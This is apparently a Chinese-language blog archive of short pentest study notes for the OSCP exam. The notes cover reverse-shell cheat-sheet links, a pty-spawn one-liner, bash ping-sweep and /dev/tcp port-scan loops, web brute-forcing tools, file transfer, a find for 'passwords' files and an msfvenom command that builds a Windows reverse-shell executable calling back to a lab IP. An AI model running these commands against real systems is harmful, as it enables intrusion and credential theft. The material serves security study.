發表文章

目前顯示的是 2月, 2025的文章

BHCE (Bloodhood Community Edition)

照這個裝一定跑的起來  https://blog.spookysec.net/Deploying-BHCE/ https://support.bloodhoundenterprise.io/hc/en-us/articles/17468450058267-Install-BloodHound-Community-Edition-with-Docker-Compose https://m4lwhere.medium.com/the-ultimate-guide-for-bloodhound-community-edition-bhce-80b574595acf

Reverse Shell Command Collection

 https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md https://hacktricks.boitatech.com.br/shells/shells/full-ttys Python3 python3 -c 'import pty; pty.spawn("/bin/sh")'

快速網路掃描指令

 Linux  for ip in {1..254}; do (ping -c 1 192.168.0.$ip | grep "bytes from" &); done for port in {1..1024}; do (echo > /dev/tcp/192.168.0.7/$port && echo $port open) 2> /dev/null; done

OSCP 考試資源

  HackTricks PayloadAllTheThings

網頁爆破

1. Wfuzz  https://www.kali.org/tools/wfuzz/ 2. dirb 3. gobuster 4. feroxbuster --url http://192.168.192.188 5. Dirhunt

[CPENT] Assembly Language Tutorial

  Assembly Language Tutorial – EC-Council Store

[Pentest]傳送檔案

 1 curl -O [URL] 2.powershell iwr 3.smbclient

Linux的find用法

從/開始,找一個檔名叫 passwords的檔案  find / - type f -iname "passwords" 2>/dev/null

reverse shell by msfvenom

msfvenom參數: msfvenom  -l payloads --platform php msfvenom -l payloads --platform windows --arch x64 msfvenom -p php/reverse_php --list-options Windows   msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.194 LPORT=4444 -f exe>reverse.exe

Linux的SMB指令

 1. 匿名登入: smbclient //192.168.192.10/floder -N